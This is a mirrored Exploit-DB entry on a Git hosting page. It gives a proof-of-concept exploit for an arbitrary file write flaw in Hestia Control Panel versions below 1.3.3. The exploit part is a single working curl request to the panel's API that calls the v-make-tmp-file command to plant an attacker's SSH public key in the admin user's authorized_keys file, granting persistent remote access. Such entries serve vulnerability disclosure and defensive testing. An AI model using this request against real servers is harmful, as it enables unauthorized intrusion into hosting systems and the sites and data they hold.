bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49667.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
553 B
Text
Raw Permalink Blame History

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
# Date: 07.03.2021
# Author: Numan Türle
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://github.com/hestiacp/hestiacp
# Version: < 1.3.3
# Tested on: HestiaCP Version 1.3.2
curl --location --request POST 'https://TARGET:8083/api/index.php' \
--form 'hash="HERE_API_KEY"' \
--form 'returncode="yes"' \
--form 'cmd="v-make-tmp-file"' \
--form 'arg1="ssh-rsa HERE_KEY"' \
--form 'arg2="/home/admin/.ssh/authorized_keys"' \
--form 'arg3=""' \
--form 'arg4=""' \
--form 'arg5=""'
Reference in a new issue View git blame Copy permalink